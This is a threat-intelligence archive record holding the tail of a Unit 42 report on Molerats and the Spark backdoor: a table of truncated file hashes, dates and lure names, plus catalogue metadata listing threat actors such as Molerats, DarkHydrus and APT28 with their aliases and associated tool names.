2017-10-22 7:03:45 50852\n8e5bf597948ea6a.. 2017-10-22 7:03:45 O\n151303254451271.. 2017-10-22 7:03:45 Nick name\n83750372d4e8c04.. 2017-10-22 7:03:45 0204\n58376e763ef0ca9.. 2017-10-22 7:03:45 R\n1c43f8f68f7b8e4.. 2017-10-22 7:03:45 ood\nab2335ba3abe97a.. 2017-10-22 7:03:45 Nick name\na4c6aea61953d51.. 2017-10-22 7:03:45 Nick name\n329e9e98f08f3d6.. 2017-10-22 7:03:45 FUD\n78696cf4370817c.. 2017-10-22 7:03:45 Ben\nec0d30d2fdd301b.. 2017-10-28 10:55:21 28-10\n9511940ed52775a.. 2017-12-02 11:16:24 \u003cblank\u003e\n Page 20 of 21 \n\n5139a334d5629c5.. 89acce7cdd354a0.. 2019-09-16 10:00:45 2019-09-16 10:00:45 bnvcs Docx\nb654dd768912e09.. 2019-09-16 10:00:45 2909\ndaa72ba2b9525d7.. 2019-09-16 10:00:45 PalCamp\n69df8e4bdc3fd69.. 2019-09-16 10:00:45 NewsMac\ncf32479ed30ae95.. 2019-12-30 9:45:44 1401\n64ea1f1e0352f3d.. 2020-01-12 10:57:50 FS1-2020\n6e60f5c65299ee7.. 2020-01-12 10:57:50 1801\nb08b8fddb9dd940.. 2020-01-12 10:57:50 FS1-2020\n04fa6aaea5e3a26.. 2020-01-12 10:57:50 up\nSource: https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/ \n Page 21 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia", "MITRE" ], "origins": [ "web" ], "references": [ "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" ], "report_names": [ "molerats-delivers-spark-backdoor" ], "threat_actors": [ { "id": "acae6371-5530-498a-8b99-c2f55652ffd5", "created_at": "2022-10-25T16:07:23.980316Z", "updated_at": "2026-04-10T02:00:04.818728Z", "deleted_at": null, "main_name": "Operation Parliament", "aliases": [], "source_name": "ETDA:Operation Parliament", "tools": [ "Remote CMD/PowerShell terminal" ], "source_id": "ETDA", "reports": null }, { "id": "a3687241-9876-477b-aa13-a7c368ffda58", "created_at": "2022-10-25T16:07:24.496902Z", "updated_at": "2026-04-10T02:00:05.010744Z", "deleted_at": null, "main_name": "Hacking Team", "aliases": [], "source_name": "ETDA:Hacking Team", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "3bda9919-b9cd-451c-89e6-c7674f8c6257", "created_at": "2023-01-06T13:46:38.782181Z", "updated_at": "2026-04-10T02:00:03.097957Z", "deleted_at": null, "main_name": "Operation Parliament", "aliases": [], "source_name": "MISPGALAXY:Operation Parliament", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e90c06e4-e3e0-4f46-a3b5-17b84b31da62", "created_at": "2023-01-06T13:46:39.018236Z", "updated_at": "2026-04-10T02:00:03.183123Z", "deleted_at": null, "main_name": "Hacking Team", "aliases": [], "source_name": "MISPGALAXY:Hacking Team", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "0c502f6d-640d-4e69-bfb8-328ba6540d4f", "created_at": "2022-10-25T15:50:23.756782Z", "updated_at": "2026-04-10T02:00:05.324924Z", "deleted_at": null, "main_name": "Molerats", "aliases": [ "Molerats", "Operation Molerats", "Gaza Cybergang" ], "source_name": "MITRE:Molerats", "tools": [ "MoleNet", "DustySky", "DropBook", "SharpStage", "PoisonIvy" ], "source_id": "MITRE", "reports": null }, { "id": "6efb28db-4d91-46cb-8ab7-fe9e8449ccfc", "created_at": "2023-01-06T13:46:38.772861Z", "updated_at": "2026-04-10T02:00:03.095095Z", "deleted_at": null, "main_name": "DarkHydrus", "aliases": [ "LazyMeerkat", "G0079", "Obscure Serpens" ], "source_name": "MISPGALAXY:DarkHydrus", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5b04780e-7b64-4e62-b776-c6749ff7dec8", "created_at": "2022-10-25T16:07:23.531741Z", "updated_at": "2026-04-10T02:00:04.643562Z", "deleted_at": null, "main_name": "DarkHydrus", "aliases": [ "ATK 77", "DarkHydrus", "G0079", "LazyMeerkat", "Obscure Serpens" ], "source_name": "ETDA:DarkHydrus", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "Mimikatz", "Phishery", "RogueRobin", "RogueRobinNET", "Trojan.Phisherly", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "e5cad6bf-fa91-4128-ba0d-2bf3ff3c6c6b", "created_at": "2025-08-07T02:03:24.53077Z", "updated_at": "2026-04-10T02:00:03.680525Z", "deleted_at": null, "main_name": "ALUMINUM SARATOGA", "aliases": [ "APT-C-23", "Arid Viper", "Desert Falcon", "Extreme Jackal ", "Gaza Cybergang", "Molerats ", "Operation DustySky ", "TA402" ], "source_name": "Secureworks:ALUMINUM SARATOGA", "tools": [ "BlackShades", "BrittleBush", "DarkComet", "LastConn", "Micropsia", "NimbleMamba", "PoisonIvy", "QuasarRAT", "XtremeRat" ], "source_id": "Secureworks", "reports": null }, { "id": "1162e0d4-b69c-423d-a4da-f3080d1d2b0c", "created_at": "2023-01-06T13:46:38.508262Z", "updated_at": "2026-04-10T02:00:03.006018Z", "deleted_at": null, "main_name": "Molerats", "aliases": [ "Gaza Cybergang", "Operation Molerats", "Extreme Jackal", "ALUMINUM SARATOGA", "G0021", "BLACKSTEM", "Gaza Hackers Team", "Gaza cybergang" ], "source_name": "MISPGALAXY:Molerats", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4fe925e8-95e5-4a63-9f96-4d0f9bedac08", "created_at": "2022-10-25T15:50:23.469077Z", "updated_at": "2026-04-10T02:00:05.384299Z", "deleted_at": null, "main_name": "DarkHydrus", "aliases": [ "DarkHydrus" ], "source_name": "MITRE:DarkHydrus", "tools": [ "Mimikatz", "RogueRobin", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null }, { "id": "847f600c-cf90-44c0-8b39-fb0d5adfcef4", "created_at": "2022-10-25T16:07:23.875541Z", "updated_at": "2026-04-10T02:00:04.768142Z", "deleted_at": null, "main_name": "Molerats", "aliases": [ "ATK 89", "Aluminum Saratoga", "Extreme Jackal", "G0021", "Gaza Cybergang", "Gaza Hackers Team", "Molerats", "Operation DustySky", "Operation DustySky Part 2", "Operation Molerats", "Operation Moonlight", "Operation SneakyPastes", "Operation TopHat", "TA402", "TAG-CT5" ], "source_name": "ETDA:Molerats", "tools": [ "BadPatch", "Bladabindi", "BrittleBush", "Chymine", "CinaRAT", "Darkmoon", "Downeks", "DropBook", "DustySky", "ExtRat", "Gen:Trojan.Heur.PT", "H-Worm", "H-Worm RAT", "Houdini", "Houdini RAT", "Hworm", "Iniduoh", "IronWind", "Jenxcus", "JhoneRAT", "Jorik", "KasperAgent", "Kognito", "LastConn", "Micropsia", "MoleNet", "Molerat Loader", "NeD Worm", "NimbleMamba", "Njw0rm", "Pierogi", "Poison Ivy", "Quasar RAT", "QuasarRAT", "SPIVY", "Scote", "SharpSploit", "SharpStage", "WSHRAT", "WelcomeChat", "Xtreme RAT", "XtremeRAT", "Yggdrasil", "dinihou", "dunihi", "njRAT", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434347, "ts_updated_at": 1775826741, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d2ca9f65335364294199311f865dacef8fe13520.pdf", "text": "https://archive.orkl.eu/d2ca9f65335364294199311f865dacef8fe13520.txt", "img": "https://archive.orkl.eu/d2ca9f65335364294199311f865dacef8fe13520.jpg" } }